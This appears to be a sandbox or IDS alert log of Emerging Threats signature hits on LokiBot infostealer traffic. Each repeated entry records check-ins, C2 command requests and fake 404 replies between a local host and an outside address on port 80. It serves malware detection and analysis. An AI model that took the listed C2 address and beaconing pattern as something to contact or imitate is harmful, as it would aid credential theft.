                                                                                                  2024-10-30T08:05:37.472418+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920294.156.177.22080TCP
                                                                                                  2024-10-30T08:05:37.472418+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920294.156.177.22080TCP
                                                                                                  2024-10-30T08:05:38.434976+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920294.156.177.22080TCP
                                                                                                  2024-10-30T08:05:38.434976+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920294.156.177.22080TCP
                                                                                                  2024-10-30T08:05:38.440923+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249202TCP
                                                                                                  2024-10-30T08:05:38.850079+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920394.156.177.22080TCP
                                                                                                  2024-10-30T08:05:38.850079+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920394.156.177.22080TCP
                                                                                                  2024-10-30T08:05:38.850079+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920394.156.177.22080TCP
                                                                                                  2024-10-30T08:05:39.810509+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920394.156.177.22080TCP
                                                                                                  2024-10-30T08:05:39.810509+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920394.156.177.22080TCP
                                                                                                  2024-10-30T08:05:39.816185+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249203TCP
                                                                                                  2024-10-30T08:05:39.974781+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920494.156.177.22080TCP
                                                                                                  2024-10-30T08:05:39.974781+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920494.156.177.22080TCP
                                                                                                  2024-10-30T08:05:39.974781+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920494.156.177.22080TCP
                                                                                                  2024-10-30T08:05:40.938395+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920494.156.177.22080TCP
                                                                                                  2024-10-30T08:05:40.938395+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920494.156.177.22080TCP
                                                                                                  2024-10-30T08:05:40.944240+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249204TCP
                                                                                                  2024-10-30T08:05:41.093295+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920594.156.177.22080TCP
                                                                                                  2024-10-30T08:05:41.093295+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920594.156.177.22080TCP
                                                                                                  2024-10-30T08:05:41.093295+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920594.156.177.22080TCP
                                                                                                  2024-10-30T08:05:42.048027+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920594.156.177.22080TCP
                                                                                                  2024-10-30T08:05:42.048027+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920594.156.177.22080TCP
                                                                                                  2024-10-30T08:05:42.053727+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249205TCP
                                                                                                  2024-10-30T08:05:42.223444+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920694.156.177.22080TCP
                                                                                                  2024-10-30T08:05:42.223444+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920694.156.177.22080TCP
                                                                                                  2024-10-30T08:05:42.223444+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920694.156.177.22080TCP
                                                                                                  2024-10-30T08:05:43.173890+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920694.156.177.22080TCP
                                                                                                  2024-10-30T08:05:43.173890+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920694.156.177.22080TCP
                                                                                                  2024-10-30T08:05:43.179636+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249206TCP
                                                                                                  2024-10-30T08:05:43.323474+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920794.156.177.22080TCP
                                                                                                  2024-10-30T08:05:43.323474+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920794.156.177.22080TCP
                                                                                                  2024-10-30T08:05:43.323474+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920794.156.177.22080TCP
                                                                                                  2024-10-30T08:05:44.297754+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920794.156.177.22080TCP
                                                                                                  2024-10-30T08:05:44.297754+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920794.156.177.22080TCP
                                                                                                  2024-10-30T08:05:44.304160+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249207TCP
                                                                                                  2024-10-30T08:05:44.443649+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920894.156.177.22080TCP
                                                                                                  2024-10-30T08:05:44.443649+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920894.156.177.22080TCP
                                                                                                  2024-10-30T08:05:44.443649+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920894.156.177.22080TCP
                                                                                                  2024-10-30T08:05:45.415337+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920894.156.177.22080TCP
                                                                                                  2024-10-30T08:05:45.415337+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920894.156.177.22080TCP
                                                                                                  2024-10-30T08:05:45.421713+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249208TCP
                                                                                                  2024-10-30T08:05:45.594078+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:45.594078+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:45.594078+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:46.562028+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:46.562028+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:46.567960+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249209TCP
                                                                                                  2024-10-30T08:05:46.719816+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921094.156.177.22080TCP
                                                                                                  2024-10-30T08:05:46.719816+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921094.156.177.22080TCP
                                                                                                  2024-10-30T08:05:46.719816+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921094.156.177.22080TCP
                                                                                                  2024-10-30T08:05:47.701361+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921094.156.177.22080TCP
                                                                                                  2024-10-30T08:05:47.701361+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921094.156.177.22080TCP
                                                                                                  2024-10-30T08:05:47.707250+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249210TCP
                                                                                                  2024-10-30T08:05:47.844722+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921194.156.177.22080TCP
                                                                                                  2024-10-30T08:05:47.844722+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921194.156.177.22080TCP
                                                                                                  2024-10-30T08:05:47.844722+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921194.156.177.22080TCP
                                                                                                  2024-10-30T08:05:48.832495+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921194.156.177.22080TCP
                                                                                                  2024-10-30T08:05:48.832495+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921194.156.177.22080TCP
                                                                                                  2024-10-30T08:05:48.838521+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249211TCP
                                                                                                  2024-10-30T08:05:48.994924+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921294.156.177.22080TCP
                                                                                                  2024-10-30T08:05:48.994924+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921294.156.177.22080TCP
                                                                                                  2024-10-30T08:05:48.994924+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921294.156.177.22080TCP
                                                                                                  2024-10-30T08:05:49.963141+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921294.156.177.22080TCP
                                                                                                  2024-10-30T08:05:49.963141+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921294.156.177.22080TCP
                                                                                                  2024-10-30T08:05:49.968928+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249212TCP
                                                                                                  2024-10-30T08:05:50.136564+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921394.156.177.22080TCP
                                                                                                  2024-10-30T08:05:50.136564+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921394.156.177.22080TCP
                                                                                                  2024-10-30T08:05:50.136564+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921394.156.177.22080TCP
                                                                                                  2024-10-30T08:05:51.172907+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921394.156.177.22080TCP
                                                                                                  2024-10-30T08:05:51.172907+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921394.156.177.22080TCP
                                                                                                  2024-10-30T08:05:51.179086+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249213TCP
                                                                                                  2024-10-30T08:05:51.723367+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921494.156.177.22080TCP
                                                                                                  2024-10-30T08:05:51.723367+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921494.156.177.22080TCP
                                                                                                  2024-10-30T08:05:51.723367+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921494.156.177.22080TCP
                                                                                                  2024-10-30T08:05:52.700629+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921494.156.177.22080TCP
                                                                                                  2024-10-30T08:05:52.700629+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921494.156.177.22080TCP
                                                                                                  2024-10-30T08:05:52.706532+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249214TCP
                                                                                                  2024-10-30T08:05:53.016944+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921594.156.177.22080TCP
                                                                                                  2024-10-30T08:05:53.016944+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921594.156.177.22080TCP
                                                                                                  2024-10-30T08:05:53.016944+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921594.156.177.22080TCP
                                                                                                  2024-10-30T08:05:53.978000+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921594.156.177.22080TCP
                                                                                                  2024-10-30T08:05:53.978000+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921594.156.177.22080TCP
                                                                                                  2024-10-30T08:05:53.983620+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249215TCP
                                                                                                  2024-10-30T08:05:54.388350+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921694.156.177.22080TCP
                                                                                                  2024-10-30T08:05:54.388350+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921694.156.177.22080TCP
                                                                                                  2024-10-30T08:05:54.388350+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921694.156.177.22080TCP
                                                                                                  2024-10-30T08:05:55.352695+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921694.156.177.22080TCP
                                                                                                  2024-10-30T08:05:55.352695+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921694.156.177.22080TCP
                                                                                                  2024-10-30T08:05:55.358620+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249216TCP
                                                                                                  2024-10-30T08:05:55.506350+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921794.156.177.22080TCP
                                                                                                  2024-10-30T08:05:55.506350+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921794.156.177.22080TCP
                                                                                                  2024-10-30T08:05:55.506350+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921794.156.177.22080TCP
                                                                                                  2024-10-30T08:05:56.467964+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921794.156.177.22080TCP
                                                                                                  2024-10-30T08:05:56.467964+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921794.156.177.22080TCP
                                                                                                  2024-10-30T08:05:56.475469+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249217TCP
                                                                                                  2024-10-30T08:05:56.882882+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921894.156.177.22080TCP
                                                                                                  2024-10-30T08:05:56.882882+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921894.156.177.22080TCP
                                                                                                  2024-10-30T08:05:56.882882+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921894.156.177.22080TCP
                                                                                                  2024-10-30T08:05:57.838085+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921894.156.177.22080TCP
                                                                                                  2024-10-30T08:05:57.838085+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921894.156.177.22080TCP
                                                                                                  2024-10-30T08:05:57.844064+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249218TCP
                                                                                                  2024-10-30T08:05:58.006444+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:58.006444+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:58.006444+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:58.928078+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:58.928078+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:58.933742+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249219TCP
                                                                                                  2024-10-30T08:05:59.129063+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922094.156.177.22080TCP
                                                                                                  2024-10-30T08:05:59.129063+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922094.156.177.22080TCP
                                                                                                  2024-10-30T08:05:59.129063+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922094.156.177.22080TCP
                                                                                                  2024-10-30T08:06:00.104218+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922094.156.177.22080TCP
                                                                                                  2024-10-30T08:06:00.104218+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922094.156.177.22080TCP
                                                                                                  2024-10-30T08:06:00.109941+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249220TCP
                                                                                                  2024-10-30T08:06:00.249790+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922194.156.177.22080TCP
                                                                                                  2024-10-30T08:06:00.249790+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922194.156.177.22080TCP
                                                                                                  2024-10-30T08:06:00.249790+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922194.156.177.22080TCP
                                                                                                  2024-10-30T08:06:01.209529+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922194.156.177.22080TCP
                                                                                                  2024-10-30T08:06:01.209529+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922194.156.177.22080TCP
                                                                                                  2024-10-30T08:06:01.215387+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249221TCP
                                                                                                  2024-10-30T08:06:01.359866+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922294.156.177.22080TCP
                                                                                                  2024-10-30T08:06:01.359866+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922294.156.177.22080TCP
                                                                                                  2024-10-30T08:06:01.359866+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922294.156.177.22080TCP
                                                                                                  2024-10-30T08:06:02.330873+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922294.156.177.22080TCP
                                                                                                  2024-10-30T08:06:02.330873+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922294.156.177.22080TCP
                                                                                                  2024-10-30T08:06:02.336909+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249222TCP
                                                                                                  2024-10-30T08:06:03.427994+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922394.156.177.22080TCP
                                                                                                  2024-10-30T08:06:03.427994+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922394.156.177.22080TCP
                                                                                                  2024-10-30T08:06:03.427994+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922394.156.177.22080TCP
                                                                                                  2024-10-30T08:06:04.389809+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922394.156.177.22080TCP
                                                                                                  2024-10-30T08:06:04.389809+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922394.156.177.22080TCP
                                                                                                  2024-10-30T08:06:04.397606+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249223TCP
                                                                                                  2024-10-30T08:06:05.794636+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922494.156.177.22080TCP
                                                                                                  2024-10-30T08:06:05.794636+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922494.156.177.22080TCP
                                                                                                  2024-10-30T08:06:05.794636+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922494.156.177.22080TCP
                                                                                                  2024-10-30T08:06:06.748732+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922494.156.177.22080TCP
                                                                                                  2024-10-30T08:06:06.748732+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922494.156.177.22080TCP
                                                                                                  2024-10-30T08:06:06.754473+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249224TCP
                                                                                                  2024-10-30T08:06:06.906331+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922594.156.177.22080TCP
                                                                                                  2024-10-30T08:06:06.906331+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922594.156.177.22080TCP
                                                                                                  2024-10-30T08:06:06.906331+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922594.156.177.22080TCP
                                                                                                  2024-10-30T08:06:07.856913+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922594.156.177.22080TCP
                                                                                                  2024-10-30T08:06:07.856913+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922594.156.177.22080TCP
                                                                                                  2024-10-30T08:06:07.863013+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249225TCP
                                                                                                  2024-10-30T08:06:08.007595+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922694.156.177.22080TCP
                                                                                                  2024-10-30T08:06:08.007595+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922694.156.177.22080TCP
                                                                                                  2024-10-30T08:06:08.007595+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922694.156.177.22080TCP
                                                                                                  2024-10-30T08:06:08.974240+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922694.156.177.22080TCP
                                                                                                  2024-10-30T08:06:08.974240+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922694.156.177.22080TCP
                                                                                                  2024-10-30T08:06:08.980015+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249226TCP
                                                                                                  2024-10-30T08:06:09.216752+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922794.156.177.22080TCP
                                                                                                  2024-10-30T08:06:09.216752+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922794.156.177.22080TCP
                                                                                                  2024-10-30T08:06:09.216752+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922794.156.177.22080TCP
                                                                                                  2024-10-30T08:06:10.183336+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922794.156.177.22080TCP
                                                                                                  2024-10-30T08:06:10.183336+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922794.156.177.22080TCP
                                                                                                  2024-10-30T08:06:10.189040+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249227TCP
                                                                                                  2024-10-30T08:06:10.329968+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922894.156.177.22080TCP
                                                                                                  2024-10-30T08:06:10.329968+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922894.156.177.22080TCP
                                                                                                  2024-10-30T08:06:10.329968+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922894.156.177.22080TCP
                                                                                                  2024-10-30T08:06:11.276041+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922894.156.177.22080TCP
                                                                                                  2024-10-30T08:06:11.276041+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922894.156.177.22080TCP
                                                                                                  2024-10-30T08:06:11.281688+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249228TCP
                                                                                                  2024-10-30T08:06:11.503152+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922994.156.177.22080TCP
                                                                                                  2024-10-30T08:06:11.503152+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922994.156.177.22080TCP
                                                                                                  2024-10-30T08:06:11.503152+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922994.156.177.22080TCP
                                                                                                  2024-10-30T08:06:12.473968+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922994.156.177.22080TCP
                                                                                                  2024-10-30T08:06:12.473968+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922994.156.177.22080TCP
                                                                                                  2024-10-30T08:06:12.479530+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249229TCP
                                                                                                  2024-10-30T08:06:12.668267+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923094.156.177.22080TCP
                                                                                                  2024-10-30T08:06:12.668267+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923094.156.177.22080TCP
                                                                                                  2024-10-30T08:06:12.668267+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923094.156.177.22080TCP
                                                                                                  2024-10-30T08:06:13.656125+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923094.156.177.22080TCP
                                                                                                  2024-10-30T08:06:13.656125+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923094.156.177.22080TCP
                                                                                                  2024-10-30T08:06:13.661910+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249230TCP
                                                                                                  2024-10-30T08:06:13.809588+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923194.156.177.22080TCP
                                                                                                  2024-10-30T08:06:13.809588+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923194.156.177.22080TCP
                                                                                                  2024-10-30T08:06:13.809588+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923194.156.177.22080TCP
                                                                                                  2024-10-30T08:06:14.768078+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923194.156.177.22080TCP
                                                                                                  2024-10-30T08:06:14.768078+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923194.156.177.22080TCP
                                                                                                  2024-10-30T08:06:14.774015+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249231TCP
                                                                                                  2024-10-30T08:06:15.137055+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923294.156.177.22080TCP
                                                                                                  2024-10-30T08:06:15.137055+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923294.156.177.22080TCP
                                                                                                  2024-10-30T08:06:15.137055+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923294.156.177.22080TCP
                                                                                                  2024-10-30T08:06:16.116463+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923294.156.177.22080TCP
                                                                                                  2024-10-30T08:06:16.116463+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923294.156.177.22080TCP
                                                                                                  2024-10-30T08:06:16.122151+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249232TCP
                                                                                                  2024-10-30T08:06:16.279985+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923394.156.177.22080TCP
                                                                                                  2024-10-30T08:06:16.279985+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923394.156.177.22080TCP
                                                                                                  2024-10-30T08:06:16.279985+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923394.156.177.22080TCP
                                                                                                  2024-10-30T08:06:17.236013+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923394.156.177.22080TCP
                                                                                                  2024-10-30T08:06:17.236013+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923394.156.177.22080TCP
                                                                                                  2024-10-30T08:06:17.241715+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249233TCP
                                                                                                  2024-10-30T08:06:17.447186+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923494.156.177.22080TCP
                                                                                                  2024-10-30T08:06:17.447186+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923494.156.177.22080TCP
                                                                                                  2024-10-30T08:06:17.447186+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923494.156.177.22080TCP
                                                                                                  2024-10-30T08:06:18.418046+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923494.156.177.22080TCP
                                                                                                  2024-10-30T08:06:18.418046+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923494.156.177.22080TCP
                                                                                                  2024-10-30T08:06:18.423880+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249234TCP
                                                                                                  2024-10-30T08:06:18.565337+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923594.156.177.22080TCP
                                                                                                  2024-10-30T08:06:18.565337+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923594.156.177.22080TCP
                                                                                                  2024-10-30T08:06:18.565337+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923594.156.177.22080TCP
                                                                                                  2024-10-30T08:06:19.512629+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923594.156.177.22080TCP
                                                                                                  2024-10-30T08:06:19.512629+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923594.156.177.22080TCP
                                                                                                  2024-10-30T08:06:19.518419+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249235TCP
                                                                                                  2024-10-30T08:06:19.664244+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923694.156.177.22080TCP
                                                                                                  2024-10-30T08:06:19.664244+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923694.156.177.22080TCP
                                                                                                  2024-10-30T08:06:19.664244+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923694.156.177.22080TCP
                                                                                                  2024-10-30T08:06:20.615050+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923694.156.177.22080TCP
                                                                                                  2024-10-30T08:06:20.615050+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923694.156.177.22080TCP
                                                                                                  2024-10-30T08:06:20.620747+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249236TCP
                                                                                                  2024-10-30T08:06:20.905171+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923794.156.177.22080TCP
                                                                                                  2024-10-30T08:06:20.905171+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923794.156.177.22080TCP
                                                                                                  2024-10-30T08:06:20.905171+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923794.156.177.22080TCP
                                                                                                  2024-10-30T08:06:21.859001+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923794.156.177.22080TCP
